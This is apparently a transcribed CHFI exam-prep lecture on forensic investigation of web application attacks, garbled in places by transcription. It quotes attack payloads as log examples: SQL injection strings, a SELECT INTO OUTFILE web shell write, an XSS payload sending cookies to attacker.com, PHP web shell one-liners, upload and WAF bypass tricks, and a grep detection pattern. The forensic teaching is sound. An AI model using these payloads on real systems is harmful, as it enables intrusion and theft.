SQL injection successfully reached the database, and the attacker ran select something into OUTFILE /var/bluew/html/shell.php. The database server just wrote a PHP web shell directly to the web root. The attacker now owns the web server, full OS command execution. Welcome to Web Application Attack Investigation, where one parameter injection becomes one web shell, becomes one full server compromise, and the CHFI examiner has to trace every link in the chain. SQL injection, 3 flavors, no all 3. Error-based. Attacker causes intentional database errors to extract information. Log entry, get/product.php question ID equals 1 quote. Status 500. Response contains a database error revealing schema details. Union-based. Append union select to extract data from other tables. Get/product.php ID equals -1 plus union plus select plus 1. Username, password, for plus from plus users, --. Key indicators. Union select, column counting with nulls, information _ schema references, blind SQL injection, no visible database output, attacker infers from true or false responses or timing. Boolean based, same URL with different parameter, different response size, and 1 = 1 returns full response, and 1 = 2 returns empty. Time-based, payload causes intentional delay. Get/product question ID equals 1 and sleep parent 5. Get/product question ID equals 1 semicolon, if parent 1 = 1 wait for. Delay 00:5. Detection, identical URLs with different response sizes, or requests with unusually long response times. XSS investigation, cross-site scripting. 3 types. Reflected, malicious script in the URL, reflected in immediate response. Non-persistent, requires victim to click. Stored, script stored in the database or comments, executed for all viewers. Persistent, most dangerous. DOM-based, script manipulates the DOM via JavaScript. No server involvement, may not appear in server logs. XSS artifacts in server logs. Reflected example, get/search.php, question q equals less than script, greater than document.location equals quote http://attacker.com/steal.php question c equals quote plus document.cookie less than /script, greater than, or URL encoded %3c script %3e. Cookie theft investigation. Step 1. Find XSS injection in web server logs. Step 2. Identify the cookie stealing URL in the payload. Step 3. Obtain logs from the attacker's server if possible. Step 4. Correlate stolen session token to victim session. Step 5. Trace subsequent actions using the stolen session. CSRF. Cross-site request forgery. Tricks an authenticated user's browser into making unauthorized requests. CSRF. Forensic artifacts. Authenticated requests performed without the user's knowledge. Requests with unexpected referrer URLs. Requests to sensitive functions. Password change, money transfer, admin actions with no preceding navigation. Missing CSRF token or mismatched token in POST parameters, suspicious patterns, POST/transfer.php with referrer http://maliciousite.com/evil page. Expected referrer would be https://bank.com/transfer form. Or no referrer at all for a sensitive action. POST/admin/delete user.php with referrer dash. Detection, check the referrer header on sensitive endpoints. Mismatches are the smoking gun. CSRF tokens. Modern apps require a hidden token in every state-changing request. Missing or invalid tokens in POST data indicate CSRF. File upload attack artifacts. 5 techniques. Direct extension, bypass, Upload file with web executable extension, shell.php, shell.asp, shell.aspx, double extension, confusion about which extension is processed, shell.php.jpg, shell.asp:.jpg. Apache and IIS handle these differently. Exploitable. Content type bypass. Change the content type header to image/jpeg even though the content is PHP null byte injection. Shell.php%00.jpg terminates file name at null byte. Older PHP versions vulnerable. MIME type mismatch. File signature does not match declared type. JPEG header followed by PHP code. File upload log indicators. Successful upload post/upload.php with file name equals shell.php and content type image JPG. Execution of uploaded shell. Get/uploads/images/shell.php. Shell usage. Get/uploads/images/shell.php $cmd equals wami. Shell usage $cmd equals cat plus/etc/passwd. Every command the attacker runs through the shell appears in your access log as a query string. WAF log analysis. Web application firewall logs include rule ID triggered, matched pattern, action taken, original request details. Mod security log example. Mod security access denied with code 403. Pattern match SQL injection attack detected via libinjection. Rule ID 942100. WAF bypass techniques to recognize. Case variation. Select instead of select. Mixed case SQL keywords. URL encoding. %5 3% 45% 4C %4 5% 4 3% 5 4 for select. Double encoding. %2527 for a single quote, %25 preceding other encoded chars. Comment insertion, SE/**/lect SQL with embedded comments. Whitespace substitution, select %09 from. Tab instead of space, HTTP parameter pollution, ID equals 1 %, ID equals 1 union select. Repeated parameters. Each bypass has a recognizable pattern in logs. Look for mixed case, URL, encoding mid-keyword, embedded comments. Web shell detection. The fundamental command, grep-rn quote, evalpipe base 64 _ decode pipe system, pipe exec pipe shell _ exec pipe, pass through, pipe proc _ open quote, /var /ww/html /-- star.php. Memorize this command. Exam test it directly. Web shell characteristics. Small file size, often 1 to 50 KB. Single file backdoor. Recent creation time. Created after legitimate deployment. Unusual location. Upload directories, image folders, CSS or JS directories. Obfuscated code. Base 64, gzip, hex encoding. Unusual permissions, world writable, executable, common web shell code patterns. Less than question PHP system $_get CMD greater than. Less than question PHP eval base 64 _ decode of payload greater than. Less than question PHP pass through $_ request C greater than. More sophisticated. Zinflate plus str _ rot13 plus base 64. Web shell investigation sequence. Identify suspicious file from logs. Locate and hash it. Examine content. Check timestamps. Find first access in logs. Trace commands executed. Check for outbound connections. Search for additional shells. Attacker often plants multiple. OWASP. Top 10 investigation patterns. A01. Broken access control. 200 responses to admin URLs by non-admin users. A02. Cryptographic failures. HTTP instead of HTTPS. Clear text credentials. A03. Injection. SQL keywords, command separators in URL. A04. Insecure design. Business logic bypass. Negative values where positive expected. A05. Security misconfiguration. Directory listing enabled, error messages disclosing. A06. Vulnerable components, exploitation of known CVE in component version. A07. Auth failures, brute force 401s, credential stuffing. A08. Software and data integrity, unsigned components, deserialization attacks. A09. Logging failures, gaps in logs, inadequate monitoring. A10. SSRF. Requests to internal IPs. Cloud metadata URLs 169.254.169.254. Database query logs. MySQL general log requires explicit enabling. Set global general log equals on. Suspicious queries. References to information underscore schema. Load underscore file. Select INTO OUTFILE for web shell creation. XP underscore CMD shell on MS SQL for OS command execution. Outbound connections from the web server process Apache W3WP are the key indicator a web shell was successfully used for command execution. Web app attack investigation in one breath. SQLi in 3 flavors. Error, union, blind. XSS in 3 flavors. Reflected, stored, DOM. CSRF detected by mismatched or missing referer. File upload bypasses, double extension, content type, null byte. WAF bypass patterns, case variation, URL encoding, comment insertion. Web shell hunting, grep-rn for eval, system, exec, shell underscore exec, pass-through. OWASP, top 10 log patterns, database logs require explicit enabling. Outbound from web server process equals web shell, USD. Domain 10 is complete. Next up, domain 11, dark web forensics. Objective 11.1, Tor, onion services, hidden marketplaces, and then domain 12, cloud forensics, the third frontier of CHFI. 20 objectives left after this. Halfway home,